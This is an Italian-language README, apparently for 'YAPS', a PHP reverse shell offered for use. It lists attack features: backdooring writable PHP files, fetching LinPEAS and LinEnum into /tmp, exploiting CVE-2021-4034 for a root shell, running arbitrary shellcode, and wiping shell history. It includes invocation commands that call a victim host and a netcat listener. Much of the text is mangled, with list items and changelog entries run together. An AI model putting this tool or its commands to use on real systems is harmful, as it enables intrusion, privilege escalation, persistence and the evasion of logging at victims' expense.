
Ennesimo PHP Shell - Il più completo reverse shell PHP

Sì, come suggerisce il nome, questa è un'altra reverse shell PHP, una tra le centinaia disponibili là fuori, ma con alcuni vantaggi. È un singolo file PHP contenente tutte le sue funzioni e puoi controllarlo tramite un semplice listener TCP (es. nc -lp 1337).
Nella versione attuale (1.5), le sue funzioni principali supportano solo sistemi Linux, ma ho intenzione di renderlo compatibile anche con Windows.
È attualmente alla sua prima versione e non l'ho ancora testato molto, e ci sono ancora molte cose che intendo fare e migliorare per le prossime versioni (non è ancora finito!), quindi per favore fammi sapere se trovi bug o hai suggerimenti per funzionalità o miglioramenti. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s o yaps.php?silent per sopprimere il bannerphp yaps.php ip port!help - Mostra il menu di aiuto!all-colors - Attiva/disattiva tutti i colori (compatibile con TTY senza colore)!color - Attiva/disattiva il colore del PS1 (solo localmente, nessuna variabile d'ambiente viene modificata)!duplicate - Avvia un'altra connessione YAPS!enum - Scarica LinPEAS e LinEnum in /tmp e li prepara per l'uso!info - Elenca informazioni sul target (l'enumerazione menzionata sopra)!infect - Infetta file PHP scrivibili con backdoor!interactive - Avvia shell reverse interattive su altre porte (funziona con sudo, su, mysql, ecc.)!passwd - Opzione password (abilita, disabilita, imposta, modifica)!php - Scrivi ed esegui PHP sull'host remoto




v1.5 - 12/02/2022
!shellcode per ricevere ed eseguire uno shellcode arbitrarioduplicate() (ora puoi specificare un intervallo di porte)stabilize a interactivev1.4 - 04/02/2022
!pwnkit per sfruttare CVE-2021-4034 e avviare una reverse shell rootverify_update()v1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect per infettare file PHP con backdoor!stabilize (bug corretti)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate per avviare un'altra shell--update|-u)--help|-h)php yaps.php ip port)v1.1 - 12/07/2021
!all-colors per attivare/disattivare i colori del terminale e funzionare con TTY senza coloreexit per chiudere il socket (lasciare la shell)!stabilize per azzerare HISTSIZE e HISTFILE!infov1.0.1 - 08/07/2021
[x,y,z] in array(x,y,z) per migliorare la compatibilità con versioni precedenti di PHPAlcune idee sono state ispirate da questi strumenti:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!pwnkit - Tenta di sfruttare CVE-2021-4034 e avviare una reverse shell root!shellcode - Invia ed esegui shellcode sull'host remoto!suggester - Scarica Linux Exploit Suggester in /tmp e lo prepara per l'uso


